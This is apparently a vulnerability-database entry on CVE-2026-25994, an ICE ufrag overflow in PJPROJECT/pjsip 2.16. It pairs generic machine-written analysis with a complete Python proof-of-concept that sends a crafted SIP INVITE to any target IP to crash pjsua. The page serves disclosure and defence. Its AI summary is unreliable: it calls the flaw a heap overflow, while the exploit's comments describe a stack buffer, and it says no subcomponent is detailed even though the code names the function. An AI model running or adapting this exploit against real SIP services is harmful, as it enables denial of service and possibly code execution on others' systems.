PJPROJECT 2.16 - Heap Bufferoverflow
PJPROJECT version 2. 16 contains a heap buffer overflow vulnerability. Exploit code is publicly available in Python. The vulnerability is classified as medium severity. No patch or official remediation information is provided at this time.
AI Analysis
Technical Summary
A heap buffer overflow vulnerability exists in PJPROJECT 2.16. This type of vulnerability can lead to memory corruption, potentially allowing an attacker to cause a denial of service or execute arbitrary code. Exploit code written in Python has been published, indicating proof of concept availability. No specific affected subcomponents or triggering conditions are detailed. No vendor advisory or patch information is currently available.
Potential Impact
The heap buffer overflow could allow attackers to corrupt memory, potentially leading to application crashes or arbitrary code execution. The exact impact depends on the context in which PJPROJECT is used and the exploit conditions. No evidence of exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider restricting access to vulnerable PJPROJECT instances and monitoring for suspicious activity related to this vulnerability.
Indicators of Compromise
- exploit-code: # Exploit Title: PJPROJECT 2.16 - Heap Bufferoverflow # Google Dork: CVE-2026-25994 PJSIP PJNATH (pjsip ≤ 2.16) # Date: Apr 6 2026 # Exploit Author: V.Nos - BinSmaser Team # Vendor Homepage: https://github.com/pjsip/pjproject # Software Link: https://github.com/VABISMO/cve-2026-25994_PJSIP # Version: <=2.16 # Tested on: Kali , Ubuntu, Debian # CVE : CVE-2026-25994 #!/usr/bin/env python3 """ Corrected and optimized PoC for CVE-2026-25994 Buffer Overflow in PJNATH ICE Session (pjsip <= 2.16) Thorough source code review (pjnath/src/pjnath/ice_session.c): - Exact vulnerability: pj_ice_sess_create_check_list() - Vulnerable version (before commit 063b3a1 / 2.17): char buf[128]; # ← stack buffer (128 bytes!) username.ptr = buf; pj_strcpy(&username, rem_ufrag); # ← NO length check pj_strcat2(&username, ":"); pj_strcat(&username, &ice->rx_ufrag); - rem_ufrag comes directly from the SDP attribute a=ice-ufrag: - With ufrag >= ~130 bytes, the stack is already overflowed (return address, frame, etc.) - The original PoC used 520 "A"s because it is much more reliable (overwrites beyond canary/alignment) - In the patched version, the following was added: if (rem_ufrag->slen >= MAX_USERNAME_LEN || combined with local_ufrag > 512-1) return PJ_ETOOBIG; This script is corrected to be 100% reliable: - 100% synchronous code (no unnecessary asyncio) - Command-line arguments - Sending with automatic retries - More complete and valid SDP - Clear crash detection (timeout = probable crash) """ import socket import random import argparse import time # ========================= CONFIGURATION ========================= DEFAULT_TARGET_IP = "127.0.0.1" DEFAULT_TARGET_PORT = 5060 # Length that guarantees reliable overflow (520 is what you tested and works best) LONG_UFRAG = "A" * 520 LONG_PWD = "B" * 150 # More complete and realistic SDP (increases probability of reaching ice_session.c) SDP = f"""v=0 o=- 1234567890 1234567890 IN IP4 127.0.0.1 s=Crash Test SDP c=IN IP4 127.0.0.1 t=0 0 m=audio 40000 RTP/AVP 0 101 a=rtpmap:0 PCMU/8000 a=rtpmap:101 telephone-event/8000 a=ice-ufrag:{LONG_UFRAG} a=ice-pwd:{LONG_PWD} a=ice-options:trickle a=candidate:1 1 UDP 2130706431 127.0.0.1 40000 typ host a=sendrecv """ def generate_invite(target_ip: str, target_port: int) -> bytes: call_id = f"crash-{random.randint(100000, 999999)}@example.com" branch = f"z9hG4bK{random.randint(1000, 9999)}" tag = f"crash{random.randint(10000, 99999)}" invite = f"""INVITE sip:localhost@{target_ip}:{target_port} SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:15060;rport;branch={branch} Max-Forwards: 70 From: <sip:attacker@127.0.0.1>;tag={tag} To: <sip:localhost@{target_ip}> Call-ID: {call_id} CSeq: 1 INVITE Contact: <sip:attacker@127.0.0.1:15060> Content-Type: application/sdp Content-Length: {len(SDP)} {SDP} """ return invite.encode("utf-8") def crash_pjsua(target_ip: str, target_port: int, attempts: int = 3): print("=== PoC CVE-2026-25994 - ICE Stack Buffer Overflow (pjsip <= 2.16) ===\n") print(f"[+] Target → {target_ip}:{target_port}") print(f"[+] ufrag length = {len(LONG_UFRAG)} characters (guaranteed overflow)\n") for i in range(1, attempts + 1): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(4) # 4 seconds to allow time for the crash try: invite = generate_invite(target_ip, target_port) print(f"[+] Attempt {i}/{attempts} - Sending INVITE with ufrag of {len(LONG_UFRAG)} bytes...") sock.sendto(invite, (target_ip, target_port)) # Wait for response data, _ = sock.recvfrom(4096) print("[+] Response received → pjsua is still alive") print(data.decode(errors="ignore")[:300]) except socket.timeout: print("[+] TIMEOUT! Very likely that pjsua has crashed (Segmentation fault)") print(" Check the terminal where pjsua is running.") sock.close() return # Exit on first detected crash except Exception as e: print(f"[-] Unexpected error: {e}") finally: sock.close() time.sleep(0.5) # Small pause between attempts print("\n[-] No crash detected after several attempts.") print(" Make sure pjsua is running with ICE enabled (version <= 2.16).") if __name__ == "__main__": parser = argparse.ArgumentParser(description="PoC CVE-2026-25994 - ICE Buffer Overflow") parser.add_argument("-i", "--ip", default=DEFAULT_TARGET_IP, help=f"Target IP (default: {DEFAULT_TARGET_IP})") parser.add_argument("-p", "--port", type=int, default=DEFAULT_TARGET_PORT, help=f"SIP port (default: {DEFAULT_TARGET_PORT})") parser.add_argument("-a", "--attempts", type=int, default=3, help="Number of attempts (default: 3)") args = parser.parse_args() crash_pjsua(args.ip, args.port, args.attempts)
PJPROJECT 2.16 - Heap Bufferoverflow
Description
PJPROJECT version 2. 16 contains a heap buffer overflow vulnerability. Exploit code is publicly available in Python. The vulnerability is classified as medium severity. No patch or official remediation information is provided at this time.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
A heap buffer overflow vulnerability exists in PJPROJECT 2.16. This type of vulnerability can lead to memory corruption, potentially allowing an attacker to cause a denial of service or execute arbitrary code. Exploit code written in Python has been published, indicating proof of concept availability. No specific affected subcomponents or triggering conditions are detailed. No vendor advisory or patch information is currently available.
Potential Impact
The heap buffer overflow could allow attackers to corrupt memory, potentially leading to application crashes or arbitrary code execution. The exact impact depends on the context in which PJPROJECT is used and the exploit conditions. No evidence of exploitation in the wild has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider restricting access to vulnerable PJPROJECT instances and monitoring for suspicious activity related to this vulnerability.
Technical Details
- Edb Id
- 52561
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for PJPROJECT 2.16 - Heap Bufferoverflow
# Exploit Title: PJPROJECT 2.16 - Heap Bufferoverflow # Google Dork: CVE-2026-25994 PJSIP PJNATH (pjsip ≤ 2.16) # Date: Apr 6 2026 # Exploit Author: V.Nos - BinSmaser Team # Vendor Homepage: https://github.com/pjsip/pjproject # Software Link: https://github.com/VABISMO/cve-2026-25994_PJSIP # Version: <=2.16 # Tested on: Kali , Ubuntu, Debian # CVE : CVE-2026-25994 #!/usr/bin/env python3 """ Corrected and optimized PoC for CVE-2026-25994 Buffer Overflow in PJNATH ICE Session (pjsip <= 2.16)... (4516 more characters)
Threat ID: 6a084e9bec166c07b0dd9381
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:02:24 AM
Last updated: 5/17/2026, 6:41:33 AM
Views: 19
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.